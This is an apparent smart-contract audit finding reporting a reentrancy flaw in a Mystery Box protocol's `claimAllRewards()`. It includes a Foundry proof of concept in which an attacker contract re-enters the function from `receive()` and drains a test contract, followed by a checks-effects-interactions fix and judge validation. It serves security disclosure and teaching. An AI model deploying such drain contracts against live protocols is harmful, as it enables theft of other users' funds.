Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: high
Valid

claimAllRewards() does not follow CEI and is therefore vulnerable to reentrancy

Summary

The function `claimAllRewards` is vulnerable to reentrancy: it sends ETH to `msg.sender` before deleting `rewardsOwned[msg.sender]`, so a malicious contract can re-enter the function during the transfer and drain all funds held by the contract.

Vulnerability Details

  1. The attacker deploys a malicious smart contract that buys boxes and opens them until it owns a reward with a non-zero value.

  2. The attacker calls the malicious contract, which in turn calls `claimAllRewards()`.

  3. `claimAllRewards()` sends the ETH before `rewardsOwned[msg.sender]` is deleted. The malicious contract's payable `receive()` (or `fallback()`) function re-enters `claimAllRewards()` on every payment it receives, until the protocol has no funds left.
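The attack in steps 1 to 3, as an added Foundry proof of concept that is not part of the original submission or the MysteryBox code. `VulnerableRewards` is a constructed stand-in: only its `claimAllRewards()` reproduces the logic quoted in the recommendation; the `Reward` struct layout, the `seedReward()` helper (standing in for buying and opening boxes) and the `Attacker` contract are assumptions made so the example compiles and runs on its own with `forge test`.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Constructed stand-in for the vulnerable contract (NOT the MysteryBox code).
contract VulnerableRewards {
    struct Reward {
        string name;
        uint256 value;
    }

    mapping(address => Reward[]) public rewardsOwned;

    // Assumption: in the real protocol rewards are won by buying and opening
    // boxes; here a funded reward is seeded directly so the attack can be shown.
    function seedReward(address to, uint256 value) external payable {
        require(msg.value == value, "fund the reward");
        rewardsOwned[to].push(Reward("Demo", value));
    }

    // Vulnerable: the external call happens before the state update.
    function claimAllRewards() public {
        uint256 totalValue = 0;
        for (uint256 i = 0; i < rewardsOwned[msg.sender].length; i++) {
            totalValue += rewardsOwned[msg.sender][i].value;
        }
        require(totalValue > 0, "No rewards to claim");
        (bool success,) = payable(msg.sender).call{value: totalValue}("");
        require(success, "Transfer failed");
        delete rewardsOwned[msg.sender]; // too late: re-entered calls saw the old array
    }
}

// Malicious contract: re-enters from receive() while the target still has funds.
contract Attacker {
    VulnerableRewards public immutable target;
    uint256 public immutable rewardValue; // value of the one reward we legitimately own

    constructor(VulnerableRewards _target, uint256 _rewardValue) {
        target = _target;
        rewardValue = _rewardValue;
    }

    function attack() external {
        target.claimAllRewards();
    }

    // call{value: ...}("") lands here. Our rewards have not been deleted yet,
    // so each re-entry pays out the same reward again.
    receive() external payable {
        if (address(target).balance >= rewardValue) {
            target.claimAllRewards();
        }
    }
}

contract ReentrancyTest is Test {
    VulnerableRewards box;
    Attacker attacker;
    address victim = makeAddr("victim");

    function setUp() public {
        vm.deal(address(this), 10 ether);
        box = new VulnerableRewards();
        attacker = new Attacker(box, 1 ether);
        // Another user's reward: these are the funds the attacker drains.
        box.seedReward{value: 3 ether}(victim, 3 ether);
        // The attacker legitimately owns a single reward worth 1 ether.
        box.seedReward{value: 1 ether}(address(attacker), 1 ether);
    }

    function test_drainsContract() public {
        assertEq(address(box).balance, 4 ether);
        attacker.attack();
        // The attacker receives 4 ether for a 1 ether reward.
        assertEq(address(box).balance, 0);
        assertEq(address(attacker).balance, 4 ether);
    }
}
```

Run with `forge test --match-contract ReentrancyTest`. Moving the `delete` above the `call`, as the recommendation does, makes every re-entered call revert with "No rewards to claim", and the whole attack transaction reverts with it.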

Impact

An attacker can drain all ETH held by the protocol, including the rewards owed to every other user.

Recommendations

Follow the checks-effects-interactions (CEI) pattern: delete the caller's rewards before sending the ETH, so that a re-entered call finds nothing to claim:

function claimAllRewards() public {
uint256 totalValue = 0;
for (uint256 i = 0; i < rewardsOwned[msg.sender].length; i++) {
totalValue += rewardsOwned[msg.sender][i].value;
}
require(totalValue > 0, "No rewards to claim");
+ delete rewardsOwned[msg.sender];
(bool success,) = payable(msg.sender).call{value: totalValue}("");
require(success, "Transfer failed");
- delete rewardsOwned[msg.sender];
}
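Review bot: the reordering of `delete rewardsOwned[msg.sender];` above the `call` is the correct fix and on its own stops the re-entry, because a nested `claimAllRewards()` now computes `totalValue == 0` and reverts on `require(totalValue > 0, "No rewards to claim")`; a failed transfer still reverts the whole transaction, so the early `delete` cannot lose rewards. Two points worth adding: state in the recommendation that the re-entered call reverts rather than silently returning, since that is what makes the fix sufficient, and consider a `nonReentrant` modifier (for example OpenZeppelin's `ReentrancyGuard`) as defense in depth, so that a future edit that re-introduces an external call before a state write does not re-open the same hole.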
Updates

Appeal created

inallhonesty Lead Judge 9 months ago
Submission Judgement Published
Validated
Assigned finding tags:

`claimAllRewards` reentrancy
